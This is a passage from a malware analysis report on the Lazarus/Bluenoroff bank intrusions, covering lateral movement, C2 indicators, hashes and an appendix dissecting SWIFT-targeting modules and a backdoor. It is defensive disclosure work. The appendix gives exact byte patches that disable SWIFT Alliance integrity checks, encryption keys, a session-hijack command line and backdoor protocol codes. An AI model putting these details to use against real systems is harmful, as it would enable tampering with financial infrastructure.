After the initial breach the attackers pivoted from infected hosts and emerged to migrate to a
safer place for persistence. A backup server was chosen as the next target.
Based on traffic logs provided for our analysis, we confirmed that there were connections to
known Bluenoroff C2 servers originating from infected hosts. The following information was
found in the network logs:
Destination:Port
Type
Bytes Transfered
82.144.131[.]5:8080
Incomplete
Less than 1KB
82.144.131[.]5:443
Less than 3KB
By checking other non-whitelisted hosts and IP ranges we were able to identify an additional C2
server belonging to the same attackers:
Destination:Port
Type
Bytes Transfered
73.245.147[.]162:443
Less than 1.5MB
While this additional C2 hasn't been reported previously, there were no additional hosts found
that connected to that server.
Lateral Movement. Host1.
During the attack, the threat actor deployed a number of other malware to a second machine we
call Host1. The malware files include:
Filename
Size
%SYSTEM%\msv2_0.dll
78'848 bytes
474f08fb4a0b8c9e1b88349098de10b1
%WINDIR%\Help\msv2_0.chm
729'088 bytes
579e45a09dc2370c71515bd0870b2078
%WINDIR%\Help\msv2_0.hlp
3'696 bytes
7413f08e12f7a4b48342a4b530c8b785
The msv2_0.dll decrypts and loads the payload from msv2_0.chm, which, in turn, decrypts and
loads a configuration file from msv2_0.hlp. msv2_0.hlp, which is encrypted with Spritz
encryption algorithm and the following key: 6B EA F5 11 DF 18 6D 74 AF F2 D9 30 8D 17 72
E4 BD A1 45 2D 3F 91 EB DE DC F6 FA 4C 9E 3A 8F 98
Full technical details about this malware are available in the Appendix.
The decrypted configuration file contains references to two previously known1 Bluenoroff C2
servers:
tradeboard.mefound[.]com:443
movis-es.ignorelist[.]com:443
Another file created around the same time was found in:
C:\Windows\Temp\tmp3363.tmp.
It included a short text file which contained the following text message:
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Additional searches by events which occurred around the same time brought some evidence of
other command line executable modules and Windows system tools being run on that day and
later. The following Prefetch files indicate the execution of other modules:
Executable
Run Counter
RUNDLL32.EXE
RUNDLL32.EXE2
FIND.EXE
GPSVC.EXE
SC.EXE
NET.EXE
NETSTAT.EXE
MSDTC.EXE
This confirms the active reconnaissance stage of the attack.
According to prefetch files for RUNDLL32.EXE, this executable was used to load msv2_0.dll
and msv2_0.chm. References to these files were found in the prefetch data of this process.
Bluenoroff is a Kaspersky Lab codename for a threat actor involved in financial targeted attacks. The
most well-known attack launched by the Bluenoroff group is the Bangladesh bank heist.
Same executable was run with different command line
Note: MSDTC.EXE and GPSVC.EXE are among the commonly used filenames of these
attackers in the past. While these filenames may look legitimate, their location was different
from the standard system equivalents.
Standard Windows msdtc.exe binary is usually located in
%systemroot%\System32\msdtc.exe, while the attacker placed msdtc.exe in
%systemroot%\msdtc.exe for disguise. The path was confirmed from parsed prefetch files.
Unfortunately the attackers have already securely wiped the msdtc.exe file in the Windows
directory. We were unable to recover this file.
The same applies to %systemroot%\gpvc.exe which existed on the dates of the attack but was
securely wiped by the attackers later.
Based on the timestamps we found so far, it seems that the initial infection of Host1 occurred
through access from a privileged account. We looked carefully at the events preceding the
infection time and found something suspicious in the Windows Security event log:
Description
Special privileges assigned to new logon.
Subject:
Security ID: [REDACTED]
Account Name: [ADMIN ACCOUNT REDACTED]
Account Domain: [REDACTED]
Logon ID: [REDACTED]
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
Then, we checked if the user
[ADMIN ACCOUNT REDACTED]' had logged into the same
system in the past. According to the event logs this had never happened before the attackers
used it. Apparently, this user logon had very high privileges (SeBackupPrivilege,
SeLoadDriverPrivilege, SeDebugPrivilege, SeImpersonatePrivilege), allowing the remote
user to fully control the host, install system services, drivers, start processes as other users, and
have full control over other processes running in the system (i.e. inject code into their memory).
Next, we searched for other event log records related to the activity of the same account, and
found several records suggesting that this account was used from Host1 to access other hosts
in the same domain.
Description
A logon was attempted using explicit credentials.
Account Whose Credentials Were Used:
Account Name: [ADMIN ACCOUNT REDACTED]
Account Domain: [REDACTED]
Logon GUID: {00000000-0000-0000-0000-000000000000}
Target Server:
Target Server Name: [REDACTED]
Additional Information: [REDACTED]
Process Information:
Process ID: 0x00000000000xxxxx
Process Name: C:\Windows\System32\schtasks.exe
Network Information:
Network Address: Port: This event is generated when a process attempts to log on an account by
explicitly specifying that account
s credentials. This most commonly
occurs in batch-type configurations such as scheduled tasks, or when
using the RUNAS command.
This indicates that the account was used to create new scheduled tasks on the remote hosts.
This is one of the popular ways to remotely run new processes and propagate infections during
cyber attacks.
Then we searched for other similar attempts to start schtasks.exe remotely on other hosts and
collected several of them.
Lateral Movement. Host2.
This host contained several unique and very large malware modules.
The following files were found on the system:
Filename
Size
C:\Windows\gpsvc.exe
3'449'344 bytes
1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae
C:\Windows\Help\srservice.chm
1'861'632 bytes
cb65d885f4799dbdf80af2214ecdc5fa
(decrypted file MD5:
ad5485fac7fed74d112799600edb2fbf)
C:\Windows\Help\srservice.hlp
3696 bytes
954f50301207c52e7616cc490b8b4d3c
(config file, see description of
ad5485fac7fed74d112799600edb2fbf)
C:\Windows\System32\srservice.dll
1'515'008 bytes
16a278d0ec24458c8e47672529835117
C:\Windows\System32\lcsvsvc.dll
1'545'216 bytes
c635e0aa816ba5fe6500ca9ecf34bd06
All of this malware were general purpose backdoors and their respective droppers, loaders and
configuration files. Details about this malware is available in the Appendix.
Lateral Movement. Host3.
The following malicious files were found on the system:
Filename
Size
C:\Windows\gpsvc.dat
901'555 bytes
c1364bbf63b3617b25b58209e4529d8c
C:\Windows\gpsvc.exe
753'664 bytes
85d316590edfb4212049c4490db08c4b
C:\Windows\msdtc.bat
454 bytes
3b1dfeb298d0fb27c31944907d900c1d
Gpsvc.dat contains an encrypted payload for an unidentified loader. It's possible that the loader
was placed on a different host following the anti-forensic technique that we have observed
previously or gpsvc.exe is the loader but we are missing the secret passphrase passed via
commandline. The decrypted files are described in the Appendix to this report.
Cease of Activity
In several cases we investigated, once the attackers were confident they had been discovered,
because they lost some of the compromised assets, they started wiping the remaining malware
payloads. This indicates a skilled attacker, who cares about being discovered.
Other Known Operations
The attack on European financial institutions was implemented via a watering hole, a
compromised government website that had many regular visitors from local banks. However,
the same approach has been used in multiple other places around the world. The Polish
waterhole incident got much more public attention than the others due to the escalation of the
alert to a higher level and the compromise of a government website.
We have seen a few other websites being compromised with the same symptoms and turned
into a watering hole through script injection or by placing exploit delivery code. We have found
them in the following countries:
Russian Federation
Australia
Uruguay
Mexico
India
Nigeria
Peru
What connected most of the compromised websites was the JBoss application server platform.
This suggests that attackers may have an exploit for the JBoss server. Unfortunately we haven
managed to find the exploit code yet. Nevertheless, we would like to recommend to all JBoss
application server administrators that they limit unnecessary access to their servers and check
the access logs for attack attempts.
Banks were not the only Lazarus Group targets. This suggests that it has multiple objectives.
We have seen some unusual victims, probably overlapping with the wider Lazarus Group
operations, i.e. a cryptocurrency business. When it comes to Bluenoroff, its typical list of targets
includes banks, financial and trading companies, casinos and cryptocurrency businesses.
Detections of Lazarus/Bluenoroff malware are also distributed across the world. Here are some:
Conclusions
Lazarus is not just another APT actor. The scale of Lazarus operations is shocking. It has been
on a growth spike since 2011 and activities didn't disappear after Novetta published the results
of its Operation Blockbuster research. All those hundreds of samples that were collected give
the impression that Lazarus is operating a factory of malware, which produces new samples via
multiple independent conveyors.
We have seen it using various code obfuscation techniques, rewriting its own algorithms,
applying commercial software protectors, and using its own and underground packers. Lazarus
knows the value of quality code, which is why we normally see rudimentary backdoors being
pushed during the first stage of infection. Burning those doesn't cause too much impact on the
group. However, if the first stage backdoor reports an interesting infection it starts deploying
more advanced code, carefully protecting it from accidental detection on disk. The code is
wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary
encrypted registry value. It usually comes with an installer that only the attackers can use,
because they password protect it. It guarantees that automated systems - be it public sandbox
or a researcher's environment - will never see the real payload.
Most of the tools are designed to be disposable material that will be replaced with a new
generation as soon as they are burnt. And then there will be newer, and newer, and newer
versions. Lazarus avoids reusing the same tools, the same code, and the same algorithms.
"Keep morphing!" seems to be its internal motto. Those rare cases when it is caught with the
same tools are operational mistakes, because the group seems to be so large that one part
doesn't know what the other is doing.
All this level of sophistication is something that is not generally found in the cybercriminal world.
It's something that requires strict organization and control at all stages of the operation. That's
why we think that Lazarus is not just another APT actor.
Of course such a process requires a lot of money to keep running the business, which is why
the appearance of the Bluenoroff subgroup within Lazarus was logical.
Bluenoroff, as a subgroup of Lazarus, is focused only on financial attacks. It has reverse
engineering skills and spends time tearing apart legitimate software, implementing patches for
SWIFT Alliance software, and finding ways and schemes to steal big money. Its malware is
different and the attackers aren't exactly soldiers that hit and run. Instead they prefer to make an
execution trace to be able to reconstruct and quickly debug the problem. They are field
engineers that come when the ground is already cleared after the conquest of new lands.
One of Bluenoroff's favorite strategies is to silently integrate into running processes without
breaking them. From the perspective of the code we've seen it looks as if it is not exactly looking
for hit and run solutions when it comes to money theft. Its solutions are aimed at invisible theft
without leaving a trace. Of course, attempts to move around millions of USD can hardly remain
unnoticed but we believe that its malware might now be secretly deployed in many other
places - and it doesn't trigger any serious alarms because it's much more quiet.
We would like to note, that in all the observed attacks against banks that we have analyzed,
servers used to connect to SWIFT didn't demonstrate or expose any specific vulnerability. The
attacks were focused on the banks
infrastructure and staff, exploiting vulnerabilities in
commonly used software or websites, bruteforcing passwords, using keyloggers and elevating
privileges. However, the design of inter-banking transactions using a bank's own server running
SWIFT connected software suggests that there are personnel responsible for the administration
and operation of the SWIFT connected server. Sooner or later the attackers find these users,
gain their necessary privileges and access the server connected to the SWIFT messaging
platform. With administrative access to the platform, they can manipulate the software running
on the system as they wish. There is not much that can stop them, because from a technical
perspective it may not differ from what authorized and qualified engineers do: starting and
stopping services, patching software, or modifying databases.
Therefore, in the breaches we analyzed, SWIFT as an organization hasn
t been directly at fault.
More than that, we have witnessed SWIFT trying to protect its customers by implementing the
detection of database and software integrity issues. We believe that this is the right direction
and has to be extended with full support. Complicating patches of integrity checks further may
create a serious threat to the success of further operations run by Lazarus/Bluenoroff against
banks worldwide.
To date, the Lazarus/Bluenoroff group has been one of the most successful in large scale
operations against financial industry. We believe that it will remain one of the biggest threats to
the banking sector, finance and trading companies as well as casinos, for years to come.
As usual, defense against attacks such as those from Lazarus/Bluenoroff should include a multilayered approach. Kaspersky Lab products include special mitigation strategies against this
group, as well as many other APT groups we track. If you are interested in reading more about
effective mitigation strategies in general, we recommend the following articles:
Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lazarus/Bluenoroff actor and will share new findings with our intel
report subscribers as well as with the general public. If you would like to be among the first to
hear our news, we suggest you subscribe to our intel reports.
For more information, contact: intelreports@kaspersky.com.
Appendix: Malware Analysis
Malware 1: SWIFT transactions Information Harvester (New Runoff)
MD5: 0abdaebbdbd5e6507e6db15f628d6fd7
Discovered path: C:\MSO10\fltmsg.exe
Date: 2016.08.18 23:44:21
Size: 90'112 bytes
Compiled on: 2016.08.18 22:24:41 (GMT)
Linker version: 10.0
Type: PE32 executable (GUI) Intel 80386, for MS Windows
Internal Bluenoroff module tag: NR
Used in: Incident #1
An almost identical file was found in another location with the following properties:
MD5: 9d1db33d89ce9d44354dcba9ebba4c2d
Discovered path: D:\Alliance\Entry\common\bin\win32\nroff.exe
Date detected: 2016-08-12 22:24:19
Size: 89'088 bytes
Compiled on: 2016.08.12 12:25:02 (GMT)
Type: PE32 executable (GUI) Intel 80386, for MS Windows
Internal module mark: NR
The compilation timestamp indicates the malware was compiled exactly one day before being
used in the bank.
The module starts from creating a "MSO10" directory on the logical drive where the Windows
system is installed, i.e. C:\MSO10. Also, it crafts several local filepaths, the purpose of which
isn't clear. Not all have reference in the code and they could be copy-pasted code or part of a
common file in the framework. The paths are represented with the following strings:
%DRIVE%:\MSO10\LATIN.SHP
%DRIVE%:\MSO10\ENGDIC.LNG
%DRIVE%:\MSO10\ADDT.REF
%DRIVE%:\MSO10\MSE.LIV
Upon starting it makes five attempts to read file C:\MSO10\LATIN.SHP with an interval of
100ms. If the LATIN.SHP container is not found or has an invalid signature, the log record will
contain the following message: "NR-PR", which we assume indicates a PRoblem loading
module codenamed "NR". The name "NR" is probably a reference to the printer helper program
called "nroff" used by SWIFT Alliance software. The origins of the nroff name go back to a Unix
text-formatting program according to Wikipedia.
The file is read successfully if its size is larger than or equal to a hardcoded value of 35,260
bytes. After that the module decrypts the file with an RC4 algorithm using a hardcoded
encryption key:
4E 38 1F A7 7F 08 CC AA 0D 56 ED EF F9 ED 08 EF.
This hardcoded key is quite unique and has been discovered in few other places, including in
other tools from the set of malware used to attack SWIFT Alliance software and within the Wiper
Tool discovered in Bangladesh in early 2016 (MD5: 5d0ffbc8389f27b0649696f0ef5b3cfe). It was
also used in another tool to encrypt configuration files as reported by BAE Systems.
The decrypted data from the file is validated by checking the magic header of the data, which
should be 0xA0B0C0D0 value. The file contains a configuration of 35,260 bytes which is copied
to a reserved memory and a sequence of data blocks of 1096 bytes each. The number of blocks
may vary, the module reads them all and stores them in a linked list structure.
There is an internal logging feature implemented in the current module, which keeps a text log
in C:\MSO10\ENGDIC.LNG. The text records are stored in lines of the following format:
[%Hour%:%Minute%:%Second%] [%Process_PID%] %Message%\r\n
The message may contain the following prefixes:
[ERROR]
[INFO]
[WARNING]
This executable is designed to be called with three parameters:
fltmsg.exe
The first parameter is a number 1 or 2. If any other value is passed to the executable it simply
saves it to the log in the format of "NR-PR-P %mode%". We assume that "NR-PR-P" is
interpreted by the attackers as "nroff problem parameter".
Mode 1 means that the module shall select the output path automatically, which contains the
following string template: "#%04d%04d.prt", otherwise the output path is copied from the third
command line argument.
For recognized modes 1 and 2 the module saves a backup for every "print file" passed to it via
command line that has the extension ".prt", ".out" or ".txt". The backups are stored in one of the
following directories:
C:\MSO10\P %N%\MOT\
C:\MSO10\R %N%\MOT\
C:\MSO10\N %N%\MOT\
Where %N% is a sequential integer number.
The malware is an information harvester. It processes files passed to it, parses them and
searches for specific SWIFT transaction codes, such as:
28C: Statement Number
25: Account Identification
Its main purpose is to accumulate information about transactions passed through it, saving
Sender and Receiver, Account and Statement Numbers as well as some other data included in
parsed files. The files passed to it are allegedly in the SWIFT transaction format, which
suggests that the attackers were closely accustomed to internal SWIFT documentation or
carefully reverse engineered the format. It recognizes the following format tags:
515 (M51)
940 (M94) - start of day balance
950 (M95) - end of day balance
When such files are found, it logs them into the log folder drive:\MSO10 and saves a copy.
The RC4-encrypted file we found (LATIN.SHP) contained the following strings after decryption:
D:\Alliance\Entry\database\bin\sqlplus.exe
D:\Alliance\Entry\common\bin\win32
D:\Alliance\Entry
C:\MSO10\fltmsg.exe
C:\MSO10\MSO.DLL
C:\MSO10\MXS.DLL
\\127.0.0.1\share
localhost\testuser
\\127.0.0.1\share\
In the older case from Bangladesh the config contained SWIFT business identifier codes (BIC)
to hide in SWIFT transaction statements.
Malware 2: SWIFT Alliance Access Protection Mangler
MD5: 198760a270a19091582a5bd841fbaec0
Size: 71'680 bytes
Discovered path: C:\MSO10\MSO.dll
Compiled on: 2016.08.18 22:24:44 (GMT)
Linker version: 10.0
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Internal Bluenoroff module tag: PM
Used in: Incident #1
The compilation timestamp indicates the malware was compiled in the days preceding the
attack on the bank.
This malware tool is used to patch some SWIFT Alliance software modules in the memory to
disable certain protection mechanisms that were implemented to detect direct database
manipulation attempts. The code was most likely created by the same developer that created
SWIFT transactions Information Harvester (MD5: 0abdaebbdbd5e6507e6db15f628d6fd7). Like
the information harvester it creates a "MSO10" directory on the logical drive where the Windows
system is installed, i.e. C:\MSO10.
It also crafts several local filepaths, the purpose of which isn't clear. Not all have reference in
the code and could be a copy-pasted code or part of common file in the framework:
%DRIVE%:\MSO10\LATIN.SHP
%DRIVE%:\MSO10\ENGDIC.LNG
%DRIVE%:\MSO10\ADDT.REF
%DRIVE%:\MSO10\MSE.LIV
Upon starting it makes five attempts to read file C:\MSO10\LATIN.SHP with an interval of
100ms. If the LATIN.SHP container is not found or is invalid, the log will contain the following
message: "PM-PR". The file is read successfully if its size is larger or equal to a hardcoded
value of 35,260. After that the module decrypts the file with an RC4 algorithm using a
hardcoded encryption key: 4E 38 1F A7 7F 08 CC AA 0D 56 ED EF F9 ED 08 EF.
The decrypted data from the file is validated by checking the magic header of the data, which
should be 0xA0B0C0D0 value.
The file contains a configuration block of 35,260 bytes which is copied to a reserved memory
and a sequence of data blocks of 1096 bytes long. The number of blocks may vary, the module
reads them all and stores them in a linked list structure.
If the LATIN.SHP file is found then the module simply counts the number of records in it and
proceeds with patching the target file, which is described further. If it is not found or the file
magic bytes differ from expected after decryption, then the patching does not happen and the
code simply drops execution.
There is an internal logging feature implemented in the current module, which keeps text log in
C:\MSO10\ENGDIC.LNG. The following log messages may appear in this file in plaintext:
Log message format
Description of values
PatchMemory(%s, %d)
%s - current executable filename
%d - 0 or 1 (0 - unpatch operation, 1 - patch
operation)
[PatchMemory] %s
%s - current executable filename
[PatchMemory] LoadLibraryA(%s) = %X %s - additional DLL filename
%X - additional DLL image base address
[WorkMemory] %s %d End
%s - executable name to be patched
%d - process ID value
This is printed in case of failure to open process
[WorkMemory] pid=%d, name=%s
%d - process ID value
%s - executable name to be patched
[Patch] 1 Already Patched %s
%s - executable name to be patched
[Unpatch] 1 Already Unpatched %s
%s - executable name to be patched
[Patch] 1 %s
%s - executable name to be patched
[Patch] 1 %s
%s - executable name to be patched
P[%u-%d] %d
%u - process ID which is patched
%d - patch index (starts from 0), corresponds to
patch block
%d - contains last WinAPI error code
This is printed in case of failure to patch memory
P[%u-%d] OK
%u - process ID which is patched
%d - patch index (starts from 0), corresponds to
patch block
[Patch] 2 Already Patched %s
%s - executable name to be patched
[Unpatch] 2 Already Unpatched %s
%s - executable name to be patched
[Patch] 2 %s
%s - executable name to be patched
[Patch] 2 %s
%s - executable name to be patched
The module has seven embedded blocks of 0x130 bytes long that contain patch target
information.
Each block seems to have four slots of 0x4C bytes with patch information. However, only the
first slot per module is used at this point. Each slot contains information for just two code
modifications.
The patch slots include the size of the patch, and the relative path to the module to be patched
on disk, offset to the patched bytes (containing the relative virtual address) and original bytes.
The patcher verifies that the original bytes are in place before modifying the code. The patch
procedure can also do unpatching by design, however this feature is currently unused.
The first slot is a patch for the liboradb.dll library which seems to be essential and is applied in
all cases. Other patches are designed for specific executables that the current SWIFT Alliance
Software Patcher DLL module is loaded in. It searches for a corresponding patch that matches
the current process executable filename and applies only that patch.
The following table contains an interpretation of the patch-blocks embedded into the binary. The
table omits empty slots and shows only valid patch instructions:
Block
Module
Patch
Original
code
Replacement
Description
liboradb.dll
0x8147e
Disables checksum
verification
Block is Unused
MXS_cont.exe
mxs_ha.exe
sis_sndmsg.exe
SNIS_sendmsg.exe
SNSS_cont.exe
0xff49
e8c2fbffff
b801000000
0x10b0c
e8c2fbffff
b801000000
0x65a9
e8c2fbffff
b801000000
0x716c
e8c2fbffff
b801000000
0x49719
e8c2fbffff
b801000000
0x4a2dc
e8c2fbffff
b801000000
0xa8119
e8c2fbffff
b801000000
0xa8cdc
e8c2fbffff
b801000000
0x7849
e8c2fbffff
b801000000
0x840c
e8c2fbffff
b801000000
Disables internal
security checks.
Disables internal
security checks.
Disables internal
security checks.
Disables internal
security checks.
Disables internal
security checks.
SWIFT Alliance software binary tools are linked with file "saa_check.cpp", which provides basic
security checks and validates the integrity of the database. The patches are applied to the
modules to disable these checks and prevent the detection of database inconsistency. The file
selection is not random, as far as the SWIFT connected servers server environment is a
complex of executable files with complicated relations, the attackers identified all executables
that implemented new security features and patched them off. We have checked all other
binaries on the analyzed servers and none of other applications were linked with
saa_check.cpp, except those in the patchlist.
The patcher DLL has to be loaded into the address space of the target process to work. It is not
designed to patch other processes.
Malware 3: SWIFT Alliance software Files Hook
MD5: f5e0f57684e9da7ef96dd459b554fded
Size: 91'136 bytes
Discovered path: C:\MSO10\MXS.dll
Compiled on: 2016.08.18 22:24:31 (GMT)
Linker version: 10.0
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Internal Bluenoroff module tag: HD (alternative: HF)
Used in: Incident #1
The compilation timestamp indicates the malware was compiled during the days of the attack on
the bank.
It is very similar to SWIFT transactions Information Harvester and SWIFT Alliance software
Protection Mangler. Like the information harvester it creates a "MSO10" directory on the logical
drive where the Windows system is installed, i.e. C:\MSO10.
Similarly, it crafts several local filepaths:
%DRIVE%:\MSO10\LATIN.SHP
%DRIVE%:\MSO10\ENGDIC.LNG
%DRIVE%:\MSO10\ADDT.REF
%DRIVE%:\MSO10\MSE.LIV
Upon starting it makes five attempts to read file C:\MSO10\LATIN.SHP with an interval of
100ms. If the LATIN.SHP container is not found or is invalid, the log will contain the following
message: "HD-PR". The file is read successfully if its size is larger than or equal to a hardcoded
value of 35,260. After that the module decrypts the file with an RC4 algorithm using the
hardcoded encryption key: 4E 38 1F A7 7F 08 CC AA 0D 56 ED EF F9 ED 08 EF.
The decrypted data from the file is validated by checking the magic header of the data, which
should be 0xA0B0C0D0 value.
The file contains a configuration of 35,260 bytes which is copied to a reserved memory and a
sequence of data blocks 1096 bytes long. The number of blocks may vary, the module reads
them all and stores them in a linked list structure.
If the LATIN.SHP file is found then the module simply counts the number of records in it and
proceeds. If it is not found or the magic file bytes differ from expected after decryption, then the
patching will not happen and the code simply drops execution.
There is an internal logging feature implemented in the current module, which keeps a text log
in C:\MSO10\ENGDIC.LNG. The following log messages may appear in a file in plaintext:
Log message format
Description of values
HF_Initialize(%s)
%s - current executable filename
NewCopyFileA(%s, %s, %d)
The arguments correspond to source, destination
file and flag value for "overwrite if exists".
NewCopyFileA->CreateProcess(%s)
failed with error=%d
%s - commandline of a fltmsg.exe process
%d - Win32 API integer error code
NewCreateProcessA(%s) - 1
command line of a new process
NewCreateProcessA(%s) - 2
command line replacement
The purpose of this module is in patching the current process, so that CopyFileA function in fact
calls a custom hook function, which calls CreateProcessA and passes some arguments to it.
The command line for the new process is as follows:
C:\MSO10\fltmsg.exe 2 "%source_path%" "%destination_path%"
The path to the fltmsg.exe process is taken from the decrypted configuration file
C:\MSO10\LATIN.SHP.
Another API function, CreateProcessA is similarly hooked. Any call to create a new process,
which starts one of two recognized executables "nroff" or "printhelper", is modified. Before the
original executables are called, a custom application will be spawned with the following
commandline:
C:\MSO10\fltmsg.exe 0 %original arguments% - for nroff
C:\MSO10\fltmsg.exe 1 %original arguments% - for printhelper
If the execution fails the module logs a failure message with a Win32 API error code.
We assume that this module is injected in the middle of running SWIFT Alliance software, to
divert some of the interesting files for alteration or to make a reserve copy.
Malware 4: Session Hijacker
MD5: 2963cd266e54bd136a966bf491507bbf
Date (appeared in collection): 2015-05-23 02:27
Size: 61'440 bytes
Discovered path: c:\windows\mdtsc.exe
Compiled on: 2011.02.18 07:49:41 (GMT)
Type: PE32+ executable (console) x86-64, for MS Windows
Linker version: 10.0
Used in: Incident #1
This file is a command line tool to start a new process as another user currently logged on to the
same system. To find the user token, one of the following case-insensitive command line
options is used:
Option
Description
-n
Find token by process name
-p
Find token by process ID
-s
Find token by Terminal session ID
The last command line option defines the command line of the new process to start.
Example usage:
c:\windows\mdtsc.exe -p 8876 "rundll32.exe c:\windows\fveupdate.dll,Start MAS_search.exe"
The example tool usage was recovered from an infected system during forensic analysis. It was
used to start a SWIFT Alliance software tool via a custom application starter that most probably
tampered with the new process. The fveupdate.dll module was not recovered from the system.
Malware 5: TCP Tunnel Tool
MD5: e62a52073fd7bfd251efca9906580839
Date discovered: 2016.08.12 01:11:31
Discovered path: C:\Windows\winhlp.exe
Size: 20'480 bytes
Known as: winhlp.exe, msdtc.exe
Last start date: 2016.08.12 21:59
Started by: svchost.exe (standard Windows signed binary)
Compiled on: 2014.09.17 16:59:33 (GMT)
Type: PE32 executable (GUI) Intel 80386, for MS Windows
Linker version: 6.0
Used in: Incident #1
This application is a tool that works as a simple TCP relay that encrypts communication with C2
and contains remote reconfiguration capability. It has to be started with at least two parameters
containing host IP and port. Two additional optional parameters may define the destination
server IP and port to relay network connections to. The destination server IP and port can be
retrieved and reconfigured live from C2. Let's refer to these pairs of IP/ports as HostA/PortA and
HostB/PortB respectively.
When the tool starts it attempts to connect to the C2 server, which starts from the generation of
a handshake key. The handshake key is generated via a simple algorithm such as the following:
i = 0;
key[i] = 0xDB * i ^ 0xF7;
++i;
} while ( i < 16 );
This algorithm generates the following string:
ASCII
Hexadecimal
,-./()*+$%&\' !"
2c 2d 2e 2f 28 29 2a 2b 24 25 26 27 20 21 22
Next, it generates a message body, a string of bytes from 64 to 192 bytes long. The fifth
DWORD in the message is replaced with special code 0x00000065 ("e" character). Then it
encrypts the message with a handshake key and sends it to the C2 server with the data block
length prepended to that buffer.
This is what such a packet looks like (blue rows are encrypted with RC4 and handshake key):
Offset (bytes)
Size (bytes)
Description
Size of the rest of data in the message
Random data
Special code 0x00000065 ("e")
>=64
Random data
It expects similar behaviour from the server. The server responds with similar packet, where the
first DWORD is the size of the rest of the packet and the only meaningful value is at offset 0x14,
which must contain 0x00000066 ("f") or the handshake is not successful.
If the handshake is successful, the tool spawns a dedicated thread to deal with the C2
connection.
It uses RC4 encryption to communicate with the C2 over TCP with a hardcoded 4-bytes key
value: E2 A4 85 92.
The analyzed sample uses binary protocol for communication, exchanging messages in fixed
length blocks of 40 bytes, which are encrypted with RC4 as mentioned above. Each such block
contains a DWORD at offset 0x4 describing a control code used in the protocol. Other fields in
the block may contain additional information or be set to a randomly generated number for
distraction.
Client
Control Code
Server
Meaning
Control Code
Meaning
0x10001
Ready to work
0x10000
Keep-Alive
0x10008
Task Done
0x10002
Start tunnelling with HostB
0x10003
Set new HostB/PortB
0x10004
Get current HostB/PortB
0x10006
Terminate immediately
For the Control Code 0x10003, additional information including IP and port numbers are
transferred in the same message block at offsets 0x10 for IP and 0x14 for port.
The tool will not start connecting to HostB until it receives a 0x10002 command to start the
tunnelling process. When this happens it will open an additional, independent TCP session with
HostA, will do a handshake, and then pass all data back and forth without modification.
Other variants of the tool were found in different places:
02f75c2b47b1733f1889d6bbc026157c - uploaded to a multiscanner from Bangladesh.
459593079763f4ae74986070f47452cf - discovered in Costa Rica.
ce6e55abfe1e7767531eaf1036a5db3d - discovered in Ethiopia.
All these tools use the same hardcoded RC4 key value of E2 A4 85 92.
Malware 6: Active Backdoors
MD5: 2ef2703cfc9f6858ad9527588198b1b6
Type: PE32 executable (GUI) Intel 80386, for MS Windows
Size: 487'424 bytes
Name: mso.exe
Link time: 2016.06.14 11:56:42 (GMT)
Linker version: 6.0
Used in: Incident #1, Incident #2
This module is linked with opensource SSL/TLS suite mbedTLS (aka PolarSSL) as well as zLib
1.2.7 and libCURL libraries.
Command line options:
IMEKLMG.exe [filepath] [-i] [ ...] [-s]
self-install in the registry and restart self with previous path as argument.
[filepath]
sleep for 3 seconds, delete the specified path, restart self with option "-s".
...
one or more pairs of C2 IP and port can be passed here.
start the main backdoor mode
Starting the executable with no option is equivalent to starting with "-i", which initiates a
sequence of restarts eventually leading to self-installation into the autorun key and user's
%App_Data% directory. The final command line string to start the backdoor (as per registry
autorun key) is: C:\Users\%user%\AppData\Roaming\IMEKLMG.exe -s
Depending on the available command line arguments the module may use a C2 address from
the following locations:
1. C2 configuration stored in the registry (expected 1840 bytes). The configuration is
located at HKLM\SYSTEM\CurrentControlSet\Control\Network\EthernetDriver. The data
inside the key is encrypted with a DES algorithm with a hardcoded encryption key: 58 29
AB 7C 86 C2 A5 F9.
2. Hardcoded C2 address and port.
3. [Unfinished backdoor code] Use a C2 address and port passed via command line. Note,
this code is currently unfinished: it contains a command line argument parsing and
setting in the memory of the backdoor: up to six pairs of C2 hosts and ports can be
passed to it, but this information seems not to be reaching the main backdoor code yet.
If the registry value with config is not set upon the backdoor start, it creates this value,
populating the config with hardcoded values.
When the module is passed to a domain and port pair via the command line, config from the
registry or hardcoded value, it resolves the IP address of the domain (if the domain is passed)
and produces a different IP by decrypting the DNS request with a 4-byte XOR operation. The
XOR constant is hardcoded: 0xF4F29E1B.
Hardcoded C2s:
update.toythieves[.]com:8080
update.toythieves[.]com:443
IP xor Key
(Real C2)
Country
First Seen
Last Seen
Resolved IP (C2 disguise)
67.65.229[.]53
2015-08-05
2015-08-19
88.223.23.193
62.201.235[.]227
Iraq
2015-08-26
2015-10-23
37.87.25.23
127.0.0.1
2015-10-30
2015-11-20
100.158.242.245
46.100.250[.]10
Iran
2015-11-27
2016-01-07
53.250.8.254
76.9.60[.]204
Canada
2016-01-14
2016-08-17
87.151.206.56
The application establishes a HTTPS connection, introducing itself as "TestCom 18467"
(hostname) during a TLS handshake.
The backdoor protocol supports the following commands sent as DWORD constants:
Command ID
Description
0x91B93485
Get system information: hostname, OS version, locale, list of network
interface cards with properties.
0x91B9348E
Sleep command. Disconnect from C2. Save current time and show no
network activity for a specified time.
0x91B93491
Hibernate command. Disconnect from C2 and show no network
activity. Seems like this sleep is persistent over program restarts.
0x91B9349A
Show all available drives and used/available space on them.
0x91B9349B
List files in specified directory.
0x91B9349D
Change current directory.
0x91B93486
Run specified command.
0x91B934A6
Run specified command as another Terminal Session user.
0x91B93492
Delete file(s) based on file path pattern.
0x91B934A1
Wipe specified file two times with random DWORD value.
0x91B9348B
Compress and upload specified file path recursively.
0x91B9348A
Read data from the specified file.
0x91B93489
Write data to the specified file.
0x91B93495
Get detailed process information: PID, Session ID, CPU performance
status, memory used, full path.
0x91B93491
Kill process by name or PID.
0x91B9348C
Execute a command and read the output. This is done via the
redirection of command output to a text file in temp directory, reading
and sending the contents of the file after the process is complete.
0x91B934A5
Connect 1024 times to localhost:135 for disguise, cleanup and
shutdown.
0x91B934A4
Get current backdoor configuration.
0x91B934A3
